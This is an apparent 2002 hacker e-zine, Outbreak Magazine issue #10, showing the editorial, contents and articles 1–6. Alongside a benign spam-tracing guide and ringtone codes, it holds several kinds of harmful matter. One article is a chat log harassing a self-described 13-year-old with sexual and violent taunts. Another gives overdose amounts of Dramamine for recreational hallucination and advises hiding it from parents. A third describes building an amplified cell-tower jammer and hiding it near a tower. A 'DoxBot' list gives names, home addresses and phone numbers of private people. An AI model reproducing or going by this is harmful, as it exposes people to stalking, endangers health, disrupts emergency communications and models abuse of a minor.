Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал October 2002 - Issue #10 Outbreak Magazine - v10.0 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' "Are you ready for a battle royalle in your butthole dog?" - rambox [editorial] Hey folks. Welcome to the 10TH ISSUE! We made it to ten. It's been a long run. Lots of ups and downs. But we made it. Hope you enjoy this issue. And if you want more issues you all need to submit some articles. Send all texts to: kleptic@grex.org . The more texts the better. We can use all the help we can get. Hope you enjoy issue #10. See you in the next issue. If you're ever on IRC you can join us on any server on dal.net and /join #outbreakzine You can find most of the staff there. - kleptic <kleptic@grex.org> [/editorial] [staff writers] kleptic...................<kleptic@outbreakzine.tk> dropcode..................<dropcode@dropcode.tk> gr3p......................<gr3p@outbreakzine.tk> rambox....................<rambox@outbreakzine.tk> joja......................<jojalistic@mac.com> Turbo.....................<turbo@outbreakzine.tk> heavenly..................<jennybean@sugarpants.org> n0cixel...................<lexi@sugarpants.org> Timeless..................<timeless@hackstation.tk> Coercion..................<bah2u@hotmail.com> Lenny.....................<lenny@yourmammy.com> [/staff writers] [shout outs] All @ #outbreakzine on any dalnet server, phonelosers.org, scene.textfiles.com, dropcode.tk, fwaggle.net, dsinet.org, ameriphreak.com, surviveall.net, gr3p.net, sugarpants.org/heavenly, kleptic.tk, guruworld.org, dark-horizon.org, sugarpants.org, Everyone that helped out with this issue of Outbreak. You all rule! [/shout outs] [contact us] мппппппппппппппппппппппппппппппппппм \-л http://www.outbreakzine.tk л-/ пммммммммммммммммммммммммммммммммммп Vist Us On IRC @ irc.dal.net Join #outbreakzine Send all articles for submission to: kleptic@grex.org [/contact us] мммВ Б олмм ммлнмммлм мм ммм ллппВ млм м мм мммпВлллнполпплоллплАлАлмммммлн мн лл лпБплоллплАлн оллн олмл лл пллнпВлВлнп омА пВВВлпп п олн лмАмл лл пллн ллл ол ммлБм млл олАн п пплВВВп ВВ issue ллммБплп млБл млл плллп лллл-fwaggle ллл october ВВ Вн #10 пппВ Б ппппп 2002 оВ Вн оВ Вн file description author оВ Ан ~~~' ~~~~~~~~~~' ~~~~~' оВ Ан оВ Бн [00] Editorial kleptic оВ Бн [01] Spam: So Go0d, Its G0ne. dropcode оВ Бн [02] Pikachu's Unite! kleptic оВ Ан [03] Over the Counter & Under the Pepto joja оВ Ан [04] Attack of the cellular towers! Coercion оВ Ан [05] Nokia Cell Phone Ringtones Lenny оВ Вн [06] Dox Dox Dox Dox Dox DoxBot оВ Вн [07] Cry Little Emo Kid.. CRY! n0cixel оВ Вн [08] Curb Your Enthusiasm joja оВ Вн [09] IRC - Hacking FAQ Timeless оВ Вн [10] Specialized Common Carrier Service Adeamis оВ Вн [11] Pac Man Ninja kleptic оВ Вн [12] Digital Multiplexing System Adeamis оВ Вн [13] Getting Revenge On Spammers kleptic оВ Вн [14] Those Girls Be Fly heavenly & n0cixel оВ Вн [15] The Construction of an Acid Bomb joja оВ Вн [16] Corporate Intrusion Turbo оВ Вн [17] SQL Injection: Theory and Practice dropcode оВ Вн [18] Conclusion Outbreak Staff оВ Вн оВ лВм мВл пВлпппп п п пппплВп о н [video notice] windows users: (win98 or higher) you can open these files in notepad, and set your font to terminal, size 9. if you prefer console or MS-DOS, then just open it in MS-DOS editor, making sure if you're using windows that you hit ctrl+enter to make it full screen. linux users: view in console using an editor such as joe, or use less -R <filename>. x windows users can view by using a font such as nexus, or the terminal.pcf font that fwaggle created but lost. [/video notice] [legal notice] all texts used in this magazine are submitted by various contributors and to the best of our knowledge these contributors are the rightful copyright owners. feel free to redistribute this magazine in it's entirety, but you may not redistribute or reproduce parts of this publication without express permission from the staff. [/legal notice] Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал Outbreak Magazine Issue #10 - Article 1 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' ###################################################################### ############ Spam: So Go0d, Its G0ne. -dropcode ############ ###################################################################### ---------------------------------------------------------------------- Make Up To $10,000 per Month Working from home!! Congratulations! Here's Your Diploma! BE A MILLIONAIRE IN JUST FIVE MONTHS!!! ---------------------------------------------------------------------- ---------------------------------------------------------------------- The Problem. ---------------------------------------------------------------------- Spam or UCE (unsolicited commercial email) is basically the electronic version of the useless clutter propping open the lid of your mailbox and, often enough, blowing around in your driveway. Its useless, its irritating, its often offensive and, here on the internet, its an incredible resource hog. ---------------------------------------------------------------------- Do's and Dont's ---------------------------------------------------------------------- -Don't reply. "In order to remove your address from our mailing list simply reply to this email using 'REMOVE' as your subject." Bull-peto0ty. Never EVER reply to spam. When you do, you're verifying to the spammer that your email address does indeed exist and it will be a prime candidate for the next distribution. -Don't bother filtering. If all you care about is stopping spam from maxing out your inbox then sure, filtering might do the job. But the purpose of this file is to help educate readers about the problems spam is causing the internet, one of which is chewing up resources like oprah with a bag of cornchips. When you apply filters to your inbox, you're causing your email server to work overtime trying to process all your filters. -Do keep track. If you're really bothered by spam, do your part and fight back. Keep track of who spams you. Even if you only look into a couple of chainletters a week. I'll explain some methods of finding out where spam comes from in the next section of this article. -Do combat spambots. Hey, if nothing more... its kinda fun :D ---------------------------------------------------------------------- Tracking Spammers. ---------------------------------------------------------------------- Alright, so you have a folder full of junkmail and you're pissed. You wanna fight back but you don't know where to start... Here's a novice intro to tracking email. First of all, you're going to want to save the email to your hard-disk so that you have it handy. Open it up and take a look through the headers. There are alot of headers that come in an email, but only a few are important for our task. All of the examples I use are completely made up, the ip's are completely random and the domains, at the time of this writing, do not exist. Keep in mind that certain email software will arrange these headers differently then I have, but these fields will always be present. ---------------------------------------------------------------------- Return-Path: spamkidd13@mygrits.com Received: from lick.mygrits.com (lick.mygrits.com [192.335.127.152]) by mymailserv.com (Switch-2.1.4/Switch-2.1.0) with SMTP ID MO0107E4 for <dropc0de@mymailserv.com> Sun, 15 Sept 2002 22:11:19 +0400 Received: by lick.mygrits.com (Switch-2.1.4/Switch-2.1.0) with SMTP id MO0154F3 for <dropc0de@mymailserv.com>; Sun, 15 Sept 2002 22:10:58 +0400 Date: Sun, 15 Sept 2002 22:10:58 +0400 From: Spam Kid <spamkidd13@mygrits.com> Message-Id: <14279880235.MO0154F3@lick.mygrits.com> To: dropc0de@mymailserv.com Subject: earn 50$ an hour working from home!!! ---------------------------------------------------------------------- The above is an example of an email sent without precautions being taken to hide the identity of the sender. The return-path is the field that contains the address that will be used by your email client when you reply or by an email server to return a delivery failure. The Recieved fields contain information about the route your email took from the system it started on all the way to your mailserver. These fields should be read in reverse: the email was first sent from lick.mygrits.com [192.335.127.152] to mymailserv.com. The message was sent at 22:10:58 and recieved at 22:11:19, the entire process took 21 seconds. Now lets look at a few different tricks of the spammer trade for remaining anonymous. ---------------------------------------------------------------------- Return-Path: Bojangles@asdfasdf.com Received: from lick.mygrits.com (lick.mygrits.com [192.335.127.152]) by mymailserv.com (Switch-2.1.4/Switch-2.1.0) with SMTP ID MO0107E4 for <dropc0de@mymailserv.com> Sun, 15 Sept 2002 22:11:19 +0400 Received: by lick.mygrits.com (Switch-2.1.4/Switch-2.1.0) with SMTP id MO0154F3 for <dropc0de@mymailserv.com>; Sun, 15 Sept 2002 22:10:58 +0400 Date: Sun, 15 Sept 2002 3:00:00 +0400 From: Mr Bojangles <Bojangles@asdfasdf.com> Message-Id: <14279880235.MO0154F3@lick.mygrits.com> To: dropc0de@mymailserv.com Subject: urgent. ---------------------------------------------------------------------- In this example, a technique has been used to spoof the Return-Path and date headers. This is actually quite simple to do and easy for us to notice. Looking through the Recieved fields we see that this email took the exact same path as the last one. There's no mention of asdfasdf.com anywhere, AND the Date field is set at a completely different time than the Received fields are telling us. This might seem to be a pointless tactic for the spammer to use, but keep in mind that most email clients don't show the full list of headers unless they're asked to. By default you wouldn't see the Received fields and would therefore have no reason to suspect. Well, now that you're all advocative fans of the Received fields, its time to make things even MORE difficult. Just as we saw the Return-Path and Date fields spoofed, all the other header fields, including the Recieved fields can be spoofed as well. Before we look at an example of this type of spoof, lets look at some methods for tracing the spoof we looked at above. Well, to start, we're not exactly sure whether or not the Recieved fields were spoofed. (to keep you on track, they weren't, but pretend you don't know that yet *smirk*). A good sleuth will follow every lead he has, and the first leads are those Recieved fields. Lets take a look at where we think it started: lick.mygrits.com [192.335.127.152]. First, we'll make sure the ip we have matches the hostname. We can do this with nslookup. nslookup can be done in many different ways: webforms, *nix shells, your own box, etc: Results Returned for "lick.mygrits.com": Name: lick.mygrits.com Address: 192.335.127.152 Good, we have a match. Well, the Recieve field has passed the first test. Next we'll find out who's in charge of mygrits.com. To do this we use a service called whois. Just like nslookup, whois can be accessed in many different ways. Registrant: Lick My Grits (MYGRITS-DOM) 123 leet st. Ottawa ON, P6B 3R8 CA Domain Name: MYGRITS.COM Administrative Contact, Technical Contact: Redneck, Dumb (DRF1337) hick@mygrits.com Lick My Grits 123 leet st Ottawa ON, P6B 3R8 CA 613-320-3323 Record expires on 20-Jan-2010. Record created on 18-Jan-1998. Database last updated on 18-Sep-2002 13:09:12 EDT. Excelent, now we have a phone number and email address of someone who can help us out. We'll send Dumb Redneck an email containing the FULL header of the email we recieved and tell him to check through his logs for any reference to emails with the id's MO0107E4 or MO0154F3. Now, if the Recieved fields were faked then Dumb Redneck at mygrits.com isn't going to find anything, but... if the Recieved fields are legit then you might be able to convince him to give you the user info of whoever sent the email. This is an example of the type of user info Dumb Redneck may have sent us in reply: jdoe ttyp7 poor.sob.hisisp.com Sun Sept 15 21:40 - 22:22 (00:42) Login name: jdoe In real life: Jon Doe Directory: /usr/users/jdoe Shell: /bin/sh Excelent. Now we can forward the email to hisisp.com and that will be it for him. Kapow. ---------------------------------------------------------------------- Return-Path: Bojangles@asdfasdf.com Received: from im.a.spoof.com (lick.mygrits.com [192.335.127.152]) ID MO0107E4 for <dropc0de@mymailserv.com> Sun, 15 Sept 2002 22:11:19 +0400 Received: by neenerneener.com (Switch-2.1.4/Switch-2.1.0) with SMTP id MO0154F3 for <dropc0de@mymailserv.com>; Sun, 15 Sept 2002 22:10:58 +0400 Date: Sun, 15 Sept 2002 3:00:00 +0400 From: Mr Bojangles <Bojangles@asdfasdf.com> Message-Id: <14279880235.MO0154F3@lick.mygrits.com> To: dropc0de@mymailserv.com Subject: urgent. ---------------------------------------------------------------------- In this example, the recieved fields have been spoofed. Uh-oh. Hey, no worries. We can thwart the spoof quite easily by following the same procedure as last time. The last hop the email took was from im.a.spoof.com to mymailserv.com right? wrong. You'll notice this when you do an nslookup on im.a.spoof.com and compare it to the ip address our system got the message from. Infact, our email software did its own nslookup on the ip it had and placed the hostname it got beside the ip in the output. (lick.mygrits.com). Not all email software will be that nice however, so you might have to do the lookup yourself. What does this mean? it means that the emailer put im.a.spoof.com in place of lick.mygrits.com, but we were clever enough to notice :) If we didn't notice, we might have ended up emailing neenerneener.com and had them look through their logs for references to MO0154F3. That would have been completely useless, because that message never came near neenerneener.com. Well, now that we have a fairly firm grip on tracing email, lets move on to something else. ---------------------------------------------------------------------- Spambots. ---------------------------------------------------------------------- The spambot is the spammers evil, automaton, sidekick. They spider the web scanning webpages for mailto: tags and harvesting the email addresses within them. Spambots are generally quite easy to notice, due to a few very common behavioural traits. By its very nature, a spambot is solely interested in mailto:'s and will stop at nothing to get them. Often, a spam bot will scour a webpage from top to bottom following every link in succession ignoring images, sounds, everything but those mailto:'s. Lets have a look at a standard webserver access log. ---------------------------------------------------------------------- 192.13.104.170 - - [18/Sep/2002:10:52:42 -0700] "GET /main.html HTTP/1.1" 200 62 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.mygrits.com" 192.13.104.170 - - [18/Sep/2002:10:52:42 -0700] "GET /images/header.jpg HTTP/1.1" 200 416 "http://www.mygrits.com/main.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.mygrits.com" 192.13.104.170 - - [18/Sep/2002:10:52:42 -0700] "GET /images/tractertrailor.jpg HTTP/1.1" 200 110 "http://www.mygrits.com/main.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.mygrits.com" 192.13.104.170 - - [18/Sep/2002:10:52:42 -0700] "GET /images/pickuptruck.jpg HTTP/1.1" 200 214 "http://www.mygrits.com/main.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.mygrits.com" 192.13.104.170 - - [18/Sep/2002:10:52:42 -0700] "GET /images/shootincans.jpg HTTP/1.1" 200 114 "http://www.mygrits.com/main.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.mygrits.com" ---------------------------------------------------------------------- Heres a small page called main.html on the mygrits.com homepage. A user has just loaded the page by typing it into their browsers address field. (i'm assuming this because theres no referrer in the first GET request, if they followed a link there would be.) First the user's (192.13.104.170) client requests the main.html page using the command 'GET /main.html HTTP/1.1'. The server then replies with the response code '200', meaning everythings okay, and the size of the file in bytes. The next line indicates the referring url (omitted in the first record) followed by some information about the users browser/platform (this is called the USER-AGENT field) and finally the webpages domain. All the requests after the first one are in the same format, but you'll notice that they are requests for all the images (contained in <img src""> tags) on the page. Here's an example of a spam bot viewing www.mygrits.com/main.html: ---------------------------------------------------------------------- 192.13.104.170 - - [18/Sep/2002:10:52:42 -0700] "GET /main.html HTTP/1.1" 200 62 "Spambot v1.0(neenerneenerneener)" "www.mygrits.com" ---------------------------------------------------------------------- You'll notice two things. First of all, the spambot didn't download any images. Sometimes, users will visit your site using a text browser like lynx, you'll get the same type of entries in your logs for them. Next you'll notice the USER-AGENT. In this example, the bot sent Spambot as their user-agent. Don't take this literally, as far as I know theres no spambot named Spambot. The following is a list of user-agents to look out for. If you know of more, pass them over my way :) ExtractorPro EmailSiphon Wget EmailWolf Vitaplease WebSnake EmailCollector WebEmailExtractor Crescent CherryPicker [Ww]eb[Bb]andit Last but not least, you'll notice in your access logs that spambots will follow, as I said, every link in order from top to bottom. With these behavioural traits noted, its possible to write code to watch for these types of bots, but I'll leave that up to you. ---------------------------------------------------------------------- Combating Spambots. ---------------------------------------------------------------------- As advocative participants in the anti-spam movement, it is our duty to actively pumble all the spambots that cross our paths. When ever a spambot finds a mailto: on a page, it archives it and continues along looking for the next. The following is a small javascript that will generate a list of faux mailto:'s for the spambots to harvest. I was far from the first to think of this, infact there are plenty of programs all over the web that perform the exact same function, however, most are written in perl and c which means you'll need access to a cgi-bin or equivilent to impliment them. This is why I decided to write a javascript version. NOTE: its very important to make sure that the domains being generated do not exist. If they do exist, their servers will have to reply with a delivery failure message causing a slight burden on available resources. Whether the burden is trivial or not, its the complete opposite of what we're trying to do. ---------------------------------------------------------------------- // indigestion.js :: 5:00 PM 9/18/2002 :: -dropcode // ------------------------------------------------ function DecHex(DecVal) { HexSet = "0123456789ABCDEF"; DecVal=parseInt(DecVal); if (DecVal > 255 || DecVal < 0) { DecVal=255; } var a = DecVal % 16; var b = (DecVal-a) / 16; var HexVal = HexSet.charAt(b)+HexSet.charAt(a); return HexVal; } function generateMailtos() { document.write('<br /> This page is meant for mailto harvester _ spambots. <br /><br />') amountToGenerate = 30; minUsernameChars = 3; maxUsernameChars = 15; minDomainChars = 3; maxDomainChars = 15; username = ''; domainName = ''; for (i = 0; i < amountToGenerate; i++) { usernameChars = Math.floor(Math.random() * (maxUsernameChars_ - minUsernameChars)) + minUsernameChars; domainChars = Math.floor(Math.random() * (maxDomainChars - _ minDomainChars)) + minDomainChars; for (catonateUsername = 0; catonateUsername < usernameChars;_ catonateUsername++) { currentUNChar = Math.floor(Math.random() * (122 - 97)) + _ 97; currentUNChar = "%" + DecHex(currentUNChar) + ""; username = username + unescape(currentUNChar); } for (catonateDomain = 0; catonateDomain < domainChars; _ catonateDomain++) { currentDChar = Math.floor(Math.random() * (122 - 97)) + _ 97; currentDChar = "%" + DecHex(currentDChar) + ""; domainName = domainName + unescape(currentDChar); } addy = username + '@' + domainName; document.write('<a href="mailto:'+ addy +'.com"> '+ addy +' _ .com </a><br />'); username = ""; domainName = ""; } document.write('<br /><a href="#top">Round and round we go.</a>_ <br />') return true; } ---------------------------------------------------------------------- In order to make the code all fit in the 70 char width format I've been using, I had to split some lines in the middle. Any line ending in an underscore (_) has been split. Remove the underscore and move the code on the next line up. In order to implement the code, you'll want to give it its own dedicated .html. within the <head></head> tags of that .html you'll add a <script> tag pointing to indigestion.js (like this: <script src="indigestion.js"). Inside the body tag you'll add onLoad="generateMailtos()". Feel free to alter the variables. They are as follows: amountToGenerate = The amount of mailto: links to generate. minUsernameChars = The smallest amount of characters that the username can be. maxUsernameChars = The largest amount of characters that the username can be. minDomainChars = The smallest amount of characters that the domain name can be. maxDomainChars = The largest amount of characters that the domain name can be. The last document.write() in the code probably wont fool most bots, but if it does catch one the results will be quite interesting. considering most spambots follow all links, if it follows this one it will be caught in a loop. ---------------------------------------------------------------------- If anyone has anything to add or would like to correct me on something you can email me at dropc0de@yahoo.com. Also, drop me an email if you use my script, I'd like to see how big of a distribution it gets. Together we can beat the living crap out of spammers. Join the fight. ---------------------------------------------------------------------- greets: savvyD, ramb0x, gr3p, kleptic, dirv, jenny, lexi, lenny, turb, joja, smiley. I love you guys :D Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал Outbreak Magazine Issue #10 - Article 2 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' Pikachu's Fight The Power! ========================== by: kleptic <kleptic@grex.org> http://www.kleptic.tk AIM - kl3ptic ========================== SuperChik2527: a.s.l kl3ptic: 13/m/canada. kl3ptic: do you like pokemon ? SuperChik2527: cool cool SuperChik2527: 13.f.oklahoma kl3ptic: picachu is the shit SuperChik2527: hexc na SuperChik2527: there gay SuperChik2527: ok w/e kl3ptic: pikachu isn't gay kl3ptic: he doesnt like other pikachus of the same sex SuperChik2527: ohhhh well i'm gonna let u go kl3ptic: you're a pikachu racist SuperChik2527: no i just HATE pokemon kl3ptic: racist kl3ptic: what did they do to you? kl3ptic: my charmander will kick your ass girl! kl3ptic: then they'll give you excuse to hate them kl3ptic: my pikachu is gonna bend you over and anal rape you kl3ptic: racist kl3ptic: FIGHT THE POWER! SuperChik2527: W/E kl3ptic: don't try to confuse me with pointless internet jargon SuperChik2527: ok w.e kl3ptic: we're at a state in this country where there is way to much hate kl3ptic: and thats why pokemon are treated as political subversives! SuperChik2527: GO AWAY kl3ptic: stop the hate kl3ptic: and i'll go away girl. kl3ptic: give pokemon a chance kl3ptic: they're a nice race of creatures SuperChik2527: LEAVE ME BE kl3ptic: stop the hate.. racist SuperChik2527: GOO AWAY NOW LOSER kl3ptic: goo? kl3ptic: are you retarded? kl3ptic: if so, im sorry for calling you a racist kl3ptic: CAUSE YOU'RE A RETARDED RACIST kl3ptic: heh kl3ptic: PIKACHU! PIKACHU! kl3ptic: we're letting our voices be heard SuperChik2527: LEAVE ME ALONE NOW U MOTHER FUCKING GAY ASS PRICK kl3ptic: and we're not gonna let you bring us down! kl3ptic: FIGHT THE POWER! SuperChik2527: la who za her kl3ptic: If i was a mother fucker. i wouldnt be gay ;-) kl3ptic: SCORE ONE FOR ME! kl3ptic: woo! kl3ptic: *dances around the room* kl3ptic: you just got owned! SuperChik2527: inless ur a tranz kl3ptic: Hey my name is SuperChik2527 and I just got owned kl3ptic: WOO! kl3ptic: remember that one time, when you got owned? kl3ptic: and I pissed my pants kl3ptic: that was great. SuperChik2527: hhahahahaha i'm kl3ptic and i'm gay kl3ptic: but I can't be gay kl3ptic: Im a mother fucker kl3ptic: you are retarded arent you? kl3ptic: poor little retarded girl kl3ptic: You wanna cookie? kl3ptic: you can eat it WHILE PIKACHU BASHES YOUR SKULL IN! kl3ptic: WOO! kl3ptic: *dances with the devil* Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал Outbreak Magazine Issue #10 - Article 3 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' [over the counter and under the pepto.] [by: joja] It's mental mercy, man... I'm sure some, if not most, of you have already heard of, or experienced the effects of Dramamine. You know, the motion sickness medicine? Well, for those who haven't, and who are interested, then this text is for you. Dramamine is an over the counter drug that you can purchase at any store that has a medicine isle. It's fairly inexpensive, and can be quite interesting when taken in large doses. Although, it can sometimes be uncomfortable, scary, and I think we all know, unsafe. I'm not going to lie, taking large doses of anything can be dangerous. If this is a risk you're not willing to take, you can stop reading now. Sometimes there's a price to pay to have a little fun :). Now, there are three types of Dramamine tablets: Chewable, Less-Drowsy Formula, and Original Formula. The Original formula comes in a yellow and orange tube, and this is what you want. Depending on how big of a person you are, you might want to get two tubes just incase. Each tube contains 12 white tablets. I'm about 6'2, 150lbs, and 12 of them "does the trick," but If you're bigger, I suggest taking anywhere from 14 to 18 pills(use your better judgement). No less than 12 though, or you'll just feel like shit. Unless you're a smaller person, then I'd say anywhere from 6 to 10, give or take :D~. It's pretty much trial and error, but you may not want to do this more than once. Now that you know what to get, and how much to take, you need to set aside a night to do it. If you live at home, make sure your parents are asleep, or stay at a friend's house. Preferably somewhere you feel comfortable. This is very important! You don't want to be in ANY bad situations while taking Dramamine, which I will explain later. Now, the Dramamine euphoria is very intense, it has a strong "body-high" as well as hallucinations. It can last for a while, so be prepared. I'd say anywhere from 6 to 10 hours[rough estimate] It also will affect your hearing(hearing voices, music or other strange sounds). You can experience both closed-eye, and open-eye visuals while taking Dramamine. Unlike hallucinations from mushrooms or LSD, most of the time you cannot distinguish what is real and what isn't. You just have to be in the right mind set, and try to keep a grasp on reality. Which is why you want to stay in a calm, comfortable environment, otherwise you might go crazy. Talking to yourself is common on Dramamine, and so is talking to inanimate objects or pets. In extreme cases, talking to the voices in your head too. You may have trouble staying in one place, and it might make you feel paranoid, but I'm sure you have the will to stay sane :). It may make you sick to your stomach, but this can be avoided taking them on an empty stomach, mmmkay. ...Sometimes. It's pointless to try and carry a conversation with another person, because words get scrambled and most of the time you lose track of what you are doing/talking about, and will totally go off into another direction. I once got out of my chair to use the bathroom, took two steps, and forgot what I was doing. I stood there for at least an hour trying to remember what it was, and ended up sitting back down. Oh, that reminds me, another down side of Dramamine, it is difficult to piss, I think it makes your prostate swell or someshit, I forgot :D. I found keeping a log of my progress through the night, either by writing it down or typing it out, entertaining reading material when you're trip is over. You'll be surprised what was going through your head. Both of those may be difficult because while on Dramamine your limbs feel heavier, and it takes a lot of energy. If you get scared, or feel really uncomfortable, lay down and close your eyes. You won't be able to sleep, but usually it makes you feel better. Don't drive, or try to fuck with any power tools or anything, because that would just end up being ugly. Also try and keep yourself hydrated. Lighting is important too. You don't want to be around bright lights, so keep them dim or just turn them off. I think that's pretty much it, and I don't know what else to tell you because the Dramamine experience is hard to put into words, but Good luck, be safe, and have fun! :). Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал Outbreak Magazine Issue #10 - Article 4 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' Attack of the cellular towers! By: Coercion 22/09/02 Alright all the concepts in this article are free to write about, so like I don't really take any credit for it, though I have to give shouts to my friend intruder from the Toronto 2600 meets for bringing it into light, alright so on to the article! Basically what you'll need is a cellular disrupter which we here in Canada can get at our local spy stores, what it does is send out RTS/CTS signals meaning that all non-trimode celly's get the message ok shutting off now and boom there you go no more cell phones conversations in McDonalds or whatever fancy schmancy place you are eating at, now lets take this to the next level, instead of attacking a 40 meter radius why not take it to a higher level say your whole cellular district. All you'll really need is a 1watt signal amplifier and our device to emit RTS/CTS signals ;) you get the picture, and if you don't by now lets look at this as if we are looking at computers if you DDoS a user's box he will most likely be disconnected eventually but if you DDoS the ISP (providing you have the capability to) everyone under that ISP gets taken out, so what we do here is attack the source in this case being the local cellular tower. So find one and start up your contraption with that special amp hooked up to it then just stash it somewhere like a tree real close to the tower or somewhere where techs wont see it easily and there you go you have just taken down a bad ass area! And just in time for dinner too :) Now the only exception to this system are tri-mode cell's which are in use almost everywhere in Europe and is pretty much becoming the industry standard now, but there are still a lot of people using non-trimode, so hopefully there will be someone for you to piss off. Good Luck with your shit and if you find any concerns with this article or if everything is completely wrong then.... just change it to however you see fit and give me some credits for spending some "time" writing this. Shouts to all my friends! Listing would take too long and you know who you are :) And always remember safety first, I don't want to see people trying to tap the power lines of cellular towers and then having their carcasses picked to shit by crows cause crows are just evil! Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал Outbreak Magazine Issue #10 - Article 5 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' Adding Ringtones To Your Nokia Cell Phone by Lenny Adding ringtones is real easy to do, if you have a Nokia Cell Phone with Composer on it. First press your "Navi" key (the one you use to get to the games :-) scroll up or down with your scroll key untill you find Composer, Now you can press the dtmf pad to make music. You can save the song and use it for your ringtone. Here I have included some of my favorite ringtones. To enter the ringtones below just press the number (or key) Simpsons Theme Tempo=160 (hold 1)*, 3, 4#, 68, (hold 5)9, 3, 1, 68**, 4#, 4#, 4#, 599, 088, 088, 488#, 4#, 4#, 5, (hold 6)9#, 18*, 1, 1, 19 Sum 41 - In Too Deep Tempo=125 78, 1*#, 39, 48#, 39, 78**, 1*#, 39, 4#, 5#, 78**, 4*#, 39, 78**, 4*#, 39, 4#, 5#, 68, 5#, 3, 4#, 3, 7**, 1*#, 39, 48#, 39, 78**, 1*#, 39, 4#, 5#, 78**, 4*#, 39, 78**, 4*#, 39, 4#, 5#, 68, 5#, 3, 4#, 3, 4#, 39 Star Wars Theme Tempo=180 48, 4, 4, (hold 6)99#, (hold 4)*, 288#, 2, 1, (hold 6)99#, (hold 4)8, 28#, 2, 1, (hold 6) 99#, (hold 4)8, 28#, 2, 2#, 199, 08, 488**, 4, 4, (hold 6)99#, (hold 4)*, 288#, 2, 1, (hold 6)99#, (hold 4)8, 28#, 2, 1, (hold 6) 99#, (hold 4)8, 28#, 2, 2#, 199 Metallica - I Disappear Tempo=125 (hold 2)#, 4#, (hold 6)9#, 088, 688#, 6#, 69#, (hold 5)#, 08, 68#, 6#, 69#, 5#, 68#, 5#, 49#, 4#, 28#, (hold 2)9#, 4#, (hold 6)9#, 088, 688#, 6#, 69#, (hold 5)#, 08, 68#, 6#, 69#, 5#, 68#, 5#, 49#, 4#, 5#, 5#, 6#, 7, 1*#, 2#, 58**#, (hold 6)9#, 0, (hold 6)#, 1*#, 18#, 29#, (hold 2)#, 1#, 6**#, 59#, 088, 688#, 6#, 69#, 5#, 68#, 5#, 49#, 4#, (hold 2)# Larry (lenny for all of you that dont know) phreaking812@yahoo.com I Would like to say hi to Rambox, Gr3p, Jenny, Dropcode, Turbo, Joja Dex, Dirv, Kleptic and anyone else i missed Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл Ал Outbreak Magazine Issue #10 - Article 6 of 18 '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' Telephone Directory: ====================== Disclamer: All information in this text file is public information found in phone books across the country. Enjoy. ====================== War/Relapse: 918-241-0433 918-245-9934 (parents) ====================== Mills, Chris(r0cky) 1455 Dorwaldt Blvd (maybe)apt. 5-2 Schenectady, NY 12308 518-377-1187 Christopher R Mills 518-377-2548 913 Mason St Schenectady, NY 12308 Jennifer Mills 518-374-0520 907 Mason St Schenectady, NY 12308 ====================== Kyle McNeil 661-513-9809 27807 Crookshank Dr Santa Clarita, CA 91350 ====================== luke traxinger 605-393-0995 ====================== Acidchrome 435-647-0838 ====================== Nemish 1-847-476-2225 ====================== Tom Hagemajer/son_dem0n: 201 E Pershing Ave Phoenix, AZ 85022 Phone: 602-942-8305 ====================== Flanigan, Michael PRINCETON, WV 24740 304-425-7933 Flanigan, William 204 Forrest St PRINCETON, WV 24740 304-487-3174 ====================== Blaine Lowwer 410-789-8203 ====================== enjoy!! Love DoxBot Ал Ал ом Бл Ал Ал млл лм Бл ВлАллллпАл ммм Бл мм млллмАлппплАл Ал лл А ллБл Бл лл БллппплмБллппАлмммп АлАллл лл А ллБл Бл лл Бл АлБл Алм АмлпплАл Ал пл ллп Аллл пллмАлпллллпБл АлллпАлммлВАл 